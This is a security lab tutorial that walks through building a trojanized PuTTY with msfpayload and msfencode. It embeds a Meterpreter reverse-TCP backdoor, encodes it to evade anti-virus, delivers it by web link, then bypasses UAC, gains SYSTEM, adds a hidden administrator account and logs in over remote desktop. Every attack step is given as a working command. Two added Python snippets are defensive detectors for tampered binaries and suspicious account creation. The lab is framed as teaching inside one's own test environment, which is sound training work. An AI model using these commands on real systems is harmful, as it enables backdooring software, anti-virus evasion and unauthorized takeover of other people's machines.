




(Metasploit: Using msfpayload & msfencode)

{ Kali 1.0: msfencode Putty with msfpayload on Windows 7 }


Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard about how a malicious perpetrator placed a virus or backdoor into a game or very common internet utility?  Unfortunately, it is very simple to do so.  The following lab demonstrates how to use msfpayload to create the backdoor and msfencode to (1) bind the backdoor to Putty.exe (or a game) and to (2) possibly evade anti-virus detection.

  2. What is Metasploit?
    • The Metasploit Framework is an open-source penetration-testing tool used for developing and executing exploit code against a remote target machine. The framework has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them; on the other hand, it can also be used to break into remote systems.

  3. What is msfpayload?
    • msfpayload is a command line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing an Exploit Module.

  4. What is msfencode?
    • msfencode is another great little tool in the framework's arsenal when it comes to exploit development. Most of the time, one cannot simply use shellcode generated straight out of msfpayload. It needs to be encoded to suit the target in order to function properly. This can mean transforming your shellcode into pure alphanumeric, getting rid of bad characters, or encoding it for a 64-bit target.

  5. What is putty?
    • PuTTY is a free and open-source terminal emulator, serial console and network file transfer application. It supports several network protocols, including SCP, SSH, Telnet, rlogin, and raw socket connection. It can also connect to a serial port (since version 0.59). The name "PuTTY" has no definitive meaning.

  6. Pre-Requisite Lab
    1. Kali: Lesson 1: Installing Kali 1.0
    2. Damn Vulnerable Windows 7: Lesson 1: How to create a Damn Vulnerable Windows 7 Machine
     
  7. Lab Notes
    • In this lab we will do the following:
      1. Download Putty.exe
      2. Create backdoor with msfpayload
      3. Bind backdoor to Putty.exe and encode it with msfencode.
      4. Place the executable on an Apache Web Server
      5. Establish a Metasploit Listener
      6. Use Meterpreter to gain SYSTEM Privileges
      7. Establish a Remote Desktop Connection to Victim Machine.

  8. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Start your Windows 7 VM
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable Windows 7
      2. Click on Edit virtual machine settings

     

  3. Configure CD/DVD (IDE)
    • Instructions:
      1. Select CD/DVD (IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect
    • Note(FYI):
      1. Do not click on the OK Button

     

  4. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP address"
      3. Click the OK button
    • Note(FYI):
      1. We will use NAT instead of bridged, because of multiple VMware Player issues with Windows 7 not acquiring an IP Address when using a Wireless connection.

     

  5. Start Windows 7
    • Instructions
      1. Click on Windows 7
      2. Click on Play virtual machine

     

Section 2: Login to Windows 7
  1. Select Login User
    • Instructions:
      1. Click on Security Student
    • Note(FYI):
      • Security Student does belong to the Administrators group. 

     

  2. Switch User
    • Instructions:
      1. Supply the student password (abc123).
      2. Click on the arrow

     

Section 3: Verify you have a Network IP Address
  1. Bring up Command Prompt
    • Instructions:
      1. Click the Windows Start Button
      2. Type cmd in the search box
      3. Click on cmd

     

  2. Record IP Address
    • Instructions:
      1. ipconfig
      2. Record your IP Address
    • Notes(FYI):
      1. In my case, my IP Address is 192.168.121.167.
      2. In your case, your IP Address will probably be different.

 

Section 4: Display User Details
  1. Display User Details (On Damn Vulnerable Windows 7)
    • Instructions:
      1. net users student
    • Notes(FYI):
      • Command #1, the net users command displays the details of the student username.  Notice the student user belongs to the Administrators group.

 

Section 5: Configure Kali Virtual Machine Settings
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Kali
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Configure CD/DVD
    • Instructions:
      1. Click on CD/DVD (IDE)
      2. Click on the radio button "Use physical drive:"
      3. Select Auto detect

     

  4. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click the radio button "NAT: Used to share the host's IP Address"
      3. Click the OK Button

 

Section 6: Play and Login to Kali
  1. Start Up Kali
    • Instructions:
      1. Click on Kali
      2. Play virtual machine

     

  2. Supply Username
    • Instructions:
      1. Click Other...
      2. Username: root
      3. Click the Log In Button

     

  3. Supply Password
    • Instructions:
      1. Password: <Provide your Kali root password>
      2. Click the Log In Button

     

  4. Open a Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  5. Obtain Kali's IP Address
    • Instructions:
      1. ifconfig
      2. Record your IP Address
    • Note(FYI):
      • Command #1, ifconfig is used to display Kali's IP Address.
      • Command #2, Record your IP Address.
        • Mine is 192.168.121.158
        • Yours will probably be different.

 

Section 7: Start The Apache Web Server
  1. Start Apache
    • Instructions:
      1. cd /etc/init.d
      2. ./apache2 start
      3. ps -eaf | grep -v grep | grep apache
    • Notes(FYI):
      • Command #1, change directory to the /etc/init.d directory.
      • Command #2, start the apache web server.
      • Command #3, Show all process (ps -eaf); Ignore the actual grep process (| grep -v grep); and display only apache processes (| grep apache).

 

Section 8: Create msfpayload Backdoor
  1. Download Putty
    • Instructions:
      1. cd /var/www
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson17/putty.exe
      3. ls -l putty.exe

     

  2. Create the msfpayload
    • Notes(FYI):
      • Replace (192.168.121.158) with your Kali IP Address.
    • Instructions:
      1. cp putty.exe /usr/share/metasploit-framework/data/templates/
      2. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.121.158 LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/shikata_ga_nai -c 3
      3. chmod 744 /var/www/bad_putty.exe
      4. ls -lrta | grep putty
    • Notes(FYI):
      • Command #1, Executables, like putty.exe, must be copied to the templates directory in order to encode it with msfencode.
      • Command #2, Create a reverse_tcp payload backdoor using msfpayload that connects back to Kali (LHOST=192.168.121.158) on port (LPORT=4444). Use msfencode to bind the reverse_tcp payload backdoor to putty.exe.  Use 3 iterations of shikata_ga_nai encoding to perhaps bypass an Anti-Virus if one existed on the machine.
      • Command #3, Make bad_putty executable.
      • Command #4, List both the putty executables.
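Added defender's check (my own code, not part of the lab or of Metasploit): re-encoding putty.exe changes its bytes, so the file no longer matches the SHA-256 that the PuTTY project publishes, and a self-decoding stub like shikata_ga_nai has to run from a section that is both writable and executable. The Python below pins a hash and walks the PE section table to report such sections. The PE images it builds for testing are constructed stand-ins, and the pinned hash is whatever you copy from the vendor's download page.

```python
import hashlib
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section characteristics bits
IMAGE_SCN_MEM_WRITE = 0x80000000


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_matches(data: bytes, expected_hex: str) -> bool:
    """Compare the downloaded file against a hash pinned out of band (vendor page)."""
    return sha256_hex(data) == expected_hex.lower()


def parse_sections(data: bytes):
    """Walk the PE section table; return (name, characteristics) per section."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_hdr_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    offset = e_lfanew + 24 + opt_hdr_size  # first IMAGE_SECTION_HEADER (40 bytes each)
    sections = []
    for _ in range(num_sections):
        raw_name = struct.unpack_from("<8s", data, offset)[0]
        characteristics = struct.unpack_from("<I", data, offset + 36)[0]
        sections.append((raw_name.rstrip(b"\0").decode("ascii", "replace"), characteristics))
        offset += 40
    return sections


def rwx_sections(data: bytes):
    """Names of sections mapped writable AND executable: a heuristic for injected,
    self-modifying code (packers also do this, so treat hits as a lead, not proof)."""
    return [name for name, flags in parse_sections(data)
            if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE]


def build_sample_pe(section_flags):
    """Constructed minimal PE (DOS stub, COFF header, empty optional header,
    section table only) used as a stand-in for a real binary in tests."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_flags), 0, 0, 0, 0, 0x102)
    headers = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0, 0, 0, 0, 0, 0, 0, 0, flags)
        for name, flags in section_flags)
    return bytes(dos) + b"PE\0\0" + coff + headers
```

Run `rwx_sections(open("bad_putty.exe", "rb").read())` beside the same call on the original download to see what the encoding step added.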

 

Section 9: Start msfconsole and listener
  1. Start A Typescript
    • Instructions:
      1. script msfconsole_putty.txt
    • Notes(FYI):
      • Command #1, Makes a typescript of the terminal session. It is useful for students who need a hardcopy record of an interactive session as proof of an assignment.  Basically all input and output will be stored in the file msfconsole_putty.txt.

     

  2. Start msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      1. Command #1, The msfconsole provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF.

     

  3. Start Exploit listener
    • Notes(FYI):
      • Replace (192.168.121.158) with Kali's IP address obtained from [Section 6, Step 5].
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/meterpreter/reverse_tcp
      3. set LHOST 192.168.121.158
      4. set LPORT 4444
      5. exploit
      6. Continue to the next step

 

Section 10: Start Internet Explorer
  1. Start Internet Explorer (On the Windows 7 VM)
    • Instructions:
      1. Click the Windows Start Button
      2. Type Internet Explorer in the search box
      3. Click Internet Explorer

     

  2. Run Putty
    • Notes(FYI):
      • Replace (192.168.121.158) with Kali's IP address obtained from [Section 6, Step 5].
    • Instructions:
      1. Place the following link in the Address Bar
        • http://192.168.121.158/bad_putty.exe
      2. Click the Run Button
    • Notes(FYI):
      1. This is where the social engineering could take place.  Imagine a scenario where you get an email from a friend with an embedded link that says "click here for the new Putty or game".

     

  3. Internet Explorer - Security Warning
    • Instructions:
      1. Click Run
      2. Continue to Next Section
    • Notes(FYI):
      1. Notice this is an "Internet Explorer - Security Warning", which is not tripping the Windows Firewall.

     

  4. Putty Looks Normal
    • Instructions:
      1. Continue to Next Section

     

Section 11: Meterpreter Reconnaissance 
  1. Get System Information (On the Kali VM)
    • Instructions:
      1. Notice the Meterpreter connection between the Kali and Damn Vulnerable Windows 7 Virtual Machines
      2. sysinfo
    • Note(FYI):
      • Command #2, sysinfo reports the Computer Name, Operating System, Hardware Architecture, and System Language.

     

  2. Get UserID
    • Instructions:
      1. getuid
    • Note(FYI):
      • Command #1, getuid provides the username.

     

  3. Command Prompt
    • Instructions:
      1. shell
      2. echo %username%
    • Note(FYI):
      • Command #1, Access the Windows Console Terminal.
      • Command #2, Display the username.

     

  4. Display Users
    • Instructions:
      1. net users
    • Note(FYI):
      • Command #1, net user is a command-line tool that helps system administrators view, add or modify user accounts.

     

  5. Display Username (student) Details
    • Instructions:
      1. net users student
    • Note(FYI):
      • Command #1, Display the details of the student user account.  Notice that student is part of the Administrators group.

     

  6. Account Creation Attempt
    • Instructions:
      1. net users jhacker abc123 /ADD /FULLNAME:"Johnny Hacker"
      2. View Access denied message.
      3. exit
    • Note(FYI):
      • Command #1, try to create an account (jhacker) with password (abc123) with the name of (Johnny Hacker). 
      • Notice that even though the student user account belongs to the Administrators group, this account does not have the ability to create or modify accounts.  The next steps will show you how to escalate past Windows 7 User Account Control (UAC).
      • Command #3, exit the Command Prompt.

 

Section 12: Escalate User Privilege 
  1. Viewing Sessions
    • Instructions:
      1. background
      2. sessions -l
        • "l" as in lamb.
    • Note(FYI):
      • Command #1, Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session.
      • Command #2, sessions -l, allows a user to view all the established meterpreter sessions.

     

  2. Send UAC Bypass
    • Instructions:
      1. use exploit/windows/local/bypassuac
      2. show options
      3. set SESSION 1
        • "1" as in the number one.
      4. exploit
      5. Notice the stage being sent and creation of a new meterpreter connection.
    • Note(FYI):
      • Command #1, This is a post-exploitation (local) module that bypasses UAC (User Account Control) protection.
      • Command #2, Show options.  Notice the SESSION variable needs to be set.
      • Command #3, Set the SESSION variable to Meterpreter session 1.
      • Command #4, Exploit away.

     

  3. Get SYSTEM
    • Instructions:
      1. getuid
      2. getsystem
      3. getuid
    • Note(FYI):
      • Command #1, getuid provides the username.  Notice the username is student.
      • Command #2, The 'getsystem' command allows you to escalate the current session to the SYSTEM account from an administrator user account.  This is why your general user account should not have administrative privileges.
      • Command #3, Notice the username is now SYSTEM, which has Administrator privileges.

     

  4. Create User / Add to Administrators Group
    • Instructions:
      1. shell
      2. net users jhacker abc123 /ADD /FULLNAME:"YOUR NAME"
        • Replace (YOUR NAME) with your actual name.
      3. net localgroup Administrators jhacker /ADD
    • Note(FYI):
      1. Command #1, From the Meterpreter prompt, drop down into a Windows Terminal Console.
      2. Command #2, Create a new user (jhacker), set the password (abc123), and supply the FULLNAME (YOUR NAME).  Remember to use Your Name.
      3. Command #3, Add new user (jhacker) to the Administrators group.

     

  5. View Administrators Group
    • Instructions:
      1. net localgroup Administrators
    • Note(FYI):
      1. Command #1, Display all users that belong to the Administrators group.  Notice that jhacker is now a part of that group.

     

  6. View User Details
    • Instructions:
      1. net users jhacker
    • Note(FYI):
      1. Command #1, Display the user (jhacker) details.  You should see your name on the "Full Name" line.  Also, jhacker should belong to the Administrators group.
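Added detection logic (my own code, not part of the lab): on the Windows side, the net users /ADD and net localgroup Administrators /ADD commands above produce Security log events 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group), with NT AUTHORITY\SYSTEM as the subject once the session has been escalated with getsystem. The Python below correlates the two over constructed sample records; the record field names and the DVW7 computer name are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of Windows Security log records (not real telemetry).
# Event 4720 = user account created; 4732 = member added to a security-enabled
# local group. "subject" is who performed the action, "target" the account.
SAMPLE_EVENTS = [
    {"time": "2015-03-01 10:02:11", "id": 4720, "subject": r"NT AUTHORITY\SYSTEM",
     "target": "jhacker", "group": None},
    {"time": "2015-03-01 10:02:40", "id": 4732, "subject": r"NT AUTHORITY\SYSTEM",
     "target": "jhacker", "group": "Administrators"},
    {"time": "2015-03-01 14:15:00", "id": 4732, "subject": r"DVW7\student",
     "target": "bob", "group": "Remote Desktop Users"},
    {"time": "2015-03-02 09:00:00", "id": 4720, "subject": r"DVW7\student",
     "target": "alice", "group": None},
    {"time": "2015-03-03 09:00:00", "id": 4732, "subject": r"DVW7\student",
     "target": "alice", "group": "Administrators"},
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def find_admin_backdoor_accounts(events, window=timedelta(minutes=10)):
    """Correlate 4720 with 4732: flag accounts that were created and then added
    to the local Administrators group within `window`.
    Returns (time_of_4732, user, subject, seconds_since_creation) tuples."""
    created = {}  # lower-cased username -> creation timestamp
    alerts = []
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        if ev["id"] == 4720:
            created[ev["target"].lower()] = _ts(ev["time"])
        elif ev["id"] == 4732 and (ev["group"] or "").lower() == "administrators":
            user = ev["target"].lower()
            born = created.get(user)
            if born is None:
                continue  # pre-existing account; outside this rule's scope
            age = _ts(ev["time"]) - born
            if age <= window:
                alerts.append((ev["time"], user, ev["subject"],
                               int(age.total_seconds())))
    return alerts


if __name__ == "__main__":
    for alert in find_admin_backdoor_accounts(SAMPLE_EVENTS):
        print("new local admin shortly after creation:", alert)
```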

     

  7. Exit Metasploit Framework
    • Instructions:
      1. exit
        • Exit Windows Console Terminal
      2. exit -y
        • Exit Meterpreter Session 2
      3. exit -y
        • Exit Meterpreter Shell
      4. exit
        • Exit Type Script

 

Section 13: Remote Login into Damn Vulnerable Windows 7
  1. Open a Terminal Window (On Kali)
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  2. Remote Desktop
    • Note(FYI):
      • Replace 192.168.121.167 with the IP Address of Damn Vulnerable Windows 7 obtained from [Section 3, Step 2].
    • Instructions:
      1. rdesktop -u jhacker -p abc123 192.168.121.167 -g 80%
    • Note(FYI):
      • Command #1, Use the Remote Desktop Client (rdesktop) to connect to Damn Vulnerable Windows 7.

     

  3. Login Message
    • Instructions:
      1. Click the Yes Button
    • Note(FYI):
      • Since student is already logged in, this message is basically stating that the student account will be disconnected to allow jhacker to log in.

     

  4. Disconnecting the student account
    • Note(FYI):
      • The screen will disappear once the student account is disconnected.

     

  5. Preparing Desktop
    • Note(FYI):
      • The jhacker desktop is being prepared since this is the first login.

     

  6. Viewing Your Remote Desktop Connection
    • Note(FYI):
      • Now you have the GUI ability to navigate the Damn Vulnerable Windows 7 VM, using a Remote Desktop Connection from your Kali VM.
      • Pretty KooL stuff.

 

Section 14: Proof of Lab
  1. Open a Terminal Window (On Kali)
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  2. Proof of Lab (Basic Process Forensics)
    • Instructions:
      1. cd /var/www
      2. strings msfconsole_putty.txt | grep "Meterpreter session 2"
      3. strings msfconsole_putty.txt | grep "Full Name"
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Note(FYI):
      • Command #1, Change directory to /var/www.
      • Command #2, Use the command (strings) to display the printable characters of the file (msfconsole_putty.txt) and search (grep) for the string (Meterpreter session 2).
      • Command #3, Use the command (strings) to display the printable characters of the file (msfconsole_putty.txt) and search (grep) for the string (Full Name).
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to Moodle

     


